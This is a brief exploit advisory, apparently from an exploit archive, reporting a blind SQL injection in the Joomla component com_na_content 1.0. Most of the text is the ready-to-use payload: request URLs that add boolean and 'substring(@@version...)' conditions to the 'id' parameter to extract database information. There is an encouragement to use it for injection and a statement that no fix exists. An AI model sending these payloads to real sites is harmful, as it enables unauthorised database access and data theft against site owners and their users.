Joomla Component com_na_content 1.0 Blind SQL Injection Vulnerability

2008-12-29 21:32:11

Joomla Component com_na_content 1.0 Blind SQL Injection Vuln

Author: xoron

Exploit: /index.php?option=com_na_content&task=view&id=1 having 1=0
/index.php?option=com_na_content&task=view&id=1 having 1=1
or

/index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=4
/index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=5

!! You can use this for inj.
!! Thans for Ozan!

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.